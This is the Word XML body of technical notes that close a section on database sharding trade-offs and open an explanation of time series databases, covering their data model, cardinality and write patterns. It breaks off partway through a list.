    <w:p w14:paraId="1D0B1C9E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E559724" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Rate limiting: protect production traffic during migration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44940D54" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Rollback plan: keep source data until validation window passes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED033C4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="145EE7C2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>The Operational Complexity Tax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EDB334" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  DDL changes:     must coordinate across all shards (expand-contract pattern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15008E70" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Schema versions: application must handle transitions between schema versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5165092C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Monitoring:      per-shard metrics + cluster aggregates + imbalance detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1DB673" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Debugging:       distributed query tracing across shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AED2EF9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Disaster recovery: per-shard backup/restore + cross-shard consistency verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482FCE17" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="6D0214B4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>The Fundamental Trade-offs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E1411E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Scalability    ↔  Consistency (more shards → harder to maintain cross-shard ACID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738BDBF6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Write scale    ↔  Query flexibility (shard key optimizes some queries, penalizes others)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578251D2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Throughput     ↔  Operational complexity (each shard is a separate operational unit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D89BD08" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Data locality  ↔  Distribution (collocating related data limits sharding flexibility)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6825AA47" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Simplicity     ↔  Capacity (don't shard until necessary — vertical scaling is far simpler)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080265D9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sharding is a last resort that fundamentally changes the semantics of your database system — it should be approached as an architectural transformation, not a configuration change.</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> The moment you introduce sharding, you have made a binding commitment: every future query must be expressible in terms of the shard key, every transaction must either be shard-local or accept distributed transaction complexity, and every schema change must be coordinated across N database instances. These commitments are difficult and expensive to undo. The engineers who build systems that scale gracefully through sharding understand two things that most don't: first, that the partition key decision made before sharding determines the system's query capabilities for years — a poor shard key choice cannot be corrected without a full data migration, and even a good one constrains what queries can be efficient; second, that the goal of sharding architecture is not to distribute data as widely as possible, but to </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>partition data in the way that minimizes cross-shard operations for the actual query workload</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> — a system where 95% of queries are shard-local is dramatically simpler, faster, and more reliable than one where 60% require scatter-gather, regardless of how many shards each system has. The best sharded systems are designed so that their sharding is nearly invisible to the application — the partition key is chosen to align with the dominant access pattern, and the vast majority of the system's operation looks like a single-database system that simply scales as more shards are added.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BA40B1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Specialized Databases in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19508CE3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="3C596E53">
          <v:rect id="_x0000_i5905" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="423997FD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part 1: Time Series Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36888F3D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Time Series Databases Are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEBF832" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>A Time Series Database (TSDB) is a database optimized for storing, querying, and analyzing data points that are indexed by time — sequences of measurements collected at successive, usually regular, intervals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9D5243" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What makes time-series data unique:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50697B60" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AF0410" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3BD31F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Write-heavy: data arrives continuously at high velocity (millions of points/sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741F2918" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Append-only: data is almost never updated (you don't "edit" a sensor reading from the past)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A787FF1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Time-ordered: every data point has a timestamp as its primary dimension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD13511" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Recent-biased: recent data is queried far more than old data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ED91F7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Bulk reads: queries scan ranges of time (last hour, last 7 days), rarely single points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C055A78" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Natural expiration: old data can often be downsampled or deleted (retention policies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146C67BE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why general-purpose databases fail at time-series scale:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD495B4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7FDE46" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>PostgreSQL handling 1 million metrics/sec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677F12FF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - B-Tree index on timestamp: constant page splits (always inserting at the "end")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1108AC50" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Row overhead: 23+ bytes per row (tuple header) for a 16-byte data point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C72D37" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - MVCC bloat: dead tuples accumulate, VACUUM can't keep up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381E5AA4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Write amplification: WAL + heap + index writes for every single point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F88203D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Storage: 10M metrics/sec × 50 bytes/row × 86400 sec/day = 43 TB/day (uncompressed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2449BC1F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="3BC2C3C2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>TSDB handling same workload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DCC2CB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Append-only: sequential writes (no page splits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529AD00" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Columnar compression: 1-2 bytes per point (delta + XOR encoding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADECF3E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Batch writes: buffer in memory, flush in bulk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C122C4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Storage: 10M metrics/sec × 2 bytes/point × 86400 sec/day = 1.7 TB/day (10-25x smaller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F773F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Time Series Data Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656E6EA5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 The Core Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5897AA13" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D647797" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Metric: What's being measured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224CA9C8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → "cpu_usage", "http_request_duration", "temperature"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721A33E5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7245DB03" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Tags (Labels): Dimensions that identify the source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF007FC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → host=server-42, region=us-east, service=api-gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F3F2B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="09D70866" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Timestamp: When the measurement occurred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1969F83D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → 2026-05-28T14:30:05.123Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11650512" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="6B802CE6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Value: The measurement itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F475796" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → 78.5 (percent), 0.234 (seconds), 23.1 (degrees)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF7DBD9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="65BA032C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>A "time series" = unique combination of metric name + tag set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C18AC0B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data model example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498CDB8A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCF2A27" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Series: cpu_usage{host="server-42", core="0", region="us-east"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1590FF06" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76944F62" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (2026-05-28T14:30:00Z, 72.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B66A5F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (2026-05-28T14:30:10Z, 75.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1B9D73" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (2026-05-28T14:30:20Z, 68.9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D73FD94" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  (2026-05-28T14:30:30Z, 71.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D3BE1B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1730D326" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cardinality — the critical dimension:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47211B44" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1FDDF6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cardinality = number of unique time series in the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D93138A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="1E616190" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Low cardinality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E88F48" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  cpu_usage{host="server-1"..host="server-100"} × {core="0"..core="32"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCD78F3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  = 100 × 32 = 3,200 series (manageable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A5DA2B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="32AF7FEF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>High cardinality (dangerous):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CBC546" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  http_requests{user_id="...", endpoint="...", status="...", method="..."}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515BD2EA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  = 1M users × 100 endpoints × 5 statuses × 4 methods = 2 billion series!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB73599" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718FF935" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>High cardinality destroys TSDB performance (index too large, memory exhaustion).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B586329" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Write Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E0EDF1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78150C6A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Typical write flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8A44DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1. Agent/exporter collects metrics (every 10-60 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05805343" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  2. Batch of points sent to TSDB (hundreds to thousands per batch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2706F2AE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  3. TSDB buffers in memory (write-ahead log for durability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5098BFAC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  4. Periodically flushes to disk in compressed, columnar blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFE07BF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="427BF132" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Write characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E0D798" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Extremely regular (fixed intervals)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BBA02E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - High throughput (millions of points per second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FD0D3A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Always current time (or very recent — rarely backfill)</w:t>
